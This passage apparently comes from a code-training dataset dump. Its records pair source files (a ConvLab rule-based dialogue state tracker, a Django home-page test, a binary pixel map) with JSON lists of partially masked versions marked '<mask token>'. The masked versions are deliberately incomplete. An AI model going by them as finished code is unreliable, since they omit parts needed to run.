'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = 
copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = 
copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n",
"step-3": "<mask token>\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in 
new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n",
"step-4": "import copy\nimport json\nimport os\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 
'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n",
"step-5": "# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT license.\n\nimport copy\nimport json\nimport os\n\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n # print('------------------{}'.format(user_act))\n if not isinstance(user_act, dict):\n raise Exception('Expect user_act to be <class \\'dict\\'> type but get {}.'.format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception('Error: domain <{}> not in new belief state'.format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n # if nvalue != v:\n # _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue))\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n 
new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v)\n else:\n # raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain))\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'.format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n\n self.state = new_state\n \n return self.state\n\n def init_session(self):\n self.state = init_state()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.shortcuts import resolve_url as r
from django.test import TestCase
class coreGetHome(TestCase):
def setUp(self):
self.resp = self.client.get(r('core:core_home'))
def test_template_home(self):
self.assertTemplateUsed(self.resp, 'index.html')
def test_200_template_home(self):
self.assertEqual(200, self.resp.status_code)
|
normal
|
{
"blob_id": "d20e41dd7054ff133be264bebf13e4e218710ae5",
"index": 933,
"step-1": "<mask token>\n\n\nclass coreGetHome(TestCase):\n <mask token>\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-2": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-3": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-4": "from django.shortcuts import resolve_url as r\nfrom django.test import TestCase\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
ba1466.pngMap = [
'11111111111111111111111111111100000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000001111111111111111111111110000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000001111111111111111111111000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000000011111111111111111101000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000000011111111111111111100000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000000100111111111111100000000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000111111111111100000000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001111111111111100000000000000000000000000000111111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000011111111111111100000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000011111111111110000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000011111111111000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000011111111000000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111111110000000111000000000000000000000000000000000000111111111111111111111111111111111111111111100',
'11111111111111111111111111111111111100000000001000000000000000000000000000000000011111111111111111111111111111111111111110100000',
'11111111111111111111111111111111111111111111110000000000000000000000000000000001111111111111111111111111111111100000000000000000',
'11111111111111111111111111111111111111111111110000000000000000000000000000000000111111111111111111111111111110100000000000000000',
'11111111111111111111111111111111111111111111100000000000000000000000000000000000111111111111111111110000000000000000000000000000',
'11111111111111111111111111111111111111111111100000000000000000000000000000000001111111111111111111100000000000000000000000000000',
'11111111111111111111111111111111111111111111100001111111100000101100000000000000111111110000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111110111111111111111110000000000000110111000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111100110000000000000000000000000000000000000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'11111111111111110000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'11010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111111111',
'00000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010111111111111111111',
'11111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111',
'11111111111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111',
'11111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111',
'11111111111111111111110010000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111111111111',
'11111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111111111111',
'11111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',
'11111111111111111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111100111110000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111100001000000011111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
]
|
normal
|
{
"blob_id": "dbefca59376e567a6116dec4e07c44b1fe301ca9",
"index": 9911,
"step-1": "<mask token>\n",
"step-2": "ba1466.pngMap = [\n '11111111111111111111111111111100000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000001111111111111111111111110000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000001111111111111111111111000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000000011111111111111111101000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000000011111111111111111100000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000000100111111111111100000000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111110000000000111111111111100000000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000001111111111111100000000000000000000000000000111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000011111111111111100000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000011111111111110000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000011111111111000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n 
'11111111111111111111111111111111110000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111110000011111111000000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111110000000111000000000000000000000000000000000000111111111111111111111111111111111111111111100'\n ,\n '11111111111111111111111111111111111100000000001000000000000000000000000000000000011111111111111111111111111111111111111110100000'\n ,\n '11111111111111111111111111111111111111111111110000000000000000000000000000000001111111111111111111111111111111100000000000000000'\n ,\n '11111111111111111111111111111111111111111111110000000000000000000000000000000000111111111111111111111111111110100000000000000000'\n ,\n '11111111111111111111111111111111111111111111100000000000000000000000000000000000111111111111111111110000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111100000000000000000000000000000000001111111111111111111100000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111100001111111100000101100000000000000111111110000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111110111111111111111110000000000000110111000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111100110000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n 
'11111111111111110000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '11010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111'\n ,\n 
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111111111'\n ,\n '00000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111'\n ,\n '11111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010111111111111111111'\n ,\n '11111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111'\n ,\n '11111111111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111'\n ,\n '11111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111'\n ,\n '11111111111111111111110010000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111111111111'\n ,\n '11111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111111111111'\n ,\n 
'11111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111100111110000000000000000000001111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111100001000000011111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ]\n",
"step-3": "ba1466.pngMap = [\n'11111111111111111111111111111100000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000001111111111111111111111110000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000001111111111111111111111000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000000011111111111111111101000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000000011111111111111111100000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000000100111111111111100000000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111110000000000111111111111100000000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000001111111111111100000000000000000000000000000111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000011111111111111100000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000011111111111110000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000011111111111000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111110000001111111100000000000000000000000000000000000011111111111111111111111
111111111111111111111',\n'11111111111111111111111111111111110000011111111000000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111110000000111000000000000000000000000000000000000111111111111111111111111111111111111111111100',\n'11111111111111111111111111111111111100000000001000000000000000000000000000000000011111111111111111111111111111111111111110100000',\n'11111111111111111111111111111111111111111111110000000000000000000000000000000001111111111111111111111111111111100000000000000000',\n'11111111111111111111111111111111111111111111110000000000000000000000000000000000111111111111111111111111111110100000000000000000',\n'11111111111111111111111111111111111111111111100000000000000000000000000000000000111111111111111111110000000000000000000000000000',\n'11111111111111111111111111111111111111111111100000000000000000000000000000000001111111111111111111100000000000000000000000000000',\n'11111111111111111111111111111111111111111111100001111111100000101100000000000000111111110000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111110111111111111111110000000000000110111000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111100110000000000000000000000000000000000000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'11111111111111110000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'1101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100111111',\n'000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111111111',\n'00000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111',\n'11111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010111111111111111111',\n'11111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111',\n'11111111111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111',\n'11111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111',\n'11111111111111111111110010000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111111111111',\n'11111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111111111111',\n'11111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',\n'11111111111111111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111100111110000000000000000000001111111111111111111111111111111111111111111111111111',\n'111111111111111111111111111111111111111111111111111111111111000010000000111111111111111111